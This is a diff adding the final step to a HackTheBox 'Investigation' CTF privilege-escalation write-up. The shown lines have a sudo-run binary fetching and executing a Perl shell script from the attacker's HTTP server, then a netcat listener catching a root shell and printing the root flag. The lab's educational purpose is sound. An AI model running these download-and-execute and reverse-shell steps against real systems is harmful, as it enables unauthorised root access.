--- a/CTF-HackTheBox/2. Medium/Investigation/5. Privilege Escalation (Vertical).md
+++ b/CTF-HackTheBox/2. Medium/Investigation/5. Privilege Escalation (Vertical).md
@@ -139,3 +139,14 @@ Serving HTTP on 0.0.0.0 port 3333 (http://0.0.0.0:3333/) ...
 smorton@investigation:/$ sudo /usr/bin/binary 10.10.14.248:3333/shell.pl  lDnxUysaQn 
 Running... 
 ```
+
+10) I get the root shell and the root.txt:
+
+```
+┌──(kali㉿kali)-[~/smorton]
+└─$ nc -lnvp 9001 
+listening on [any] 9001 ...
+root@investigation:/# cat /root/root.txt
+cat /root/root.txt
+d7e782894der8fsdttrte5ksd3218c45
+```
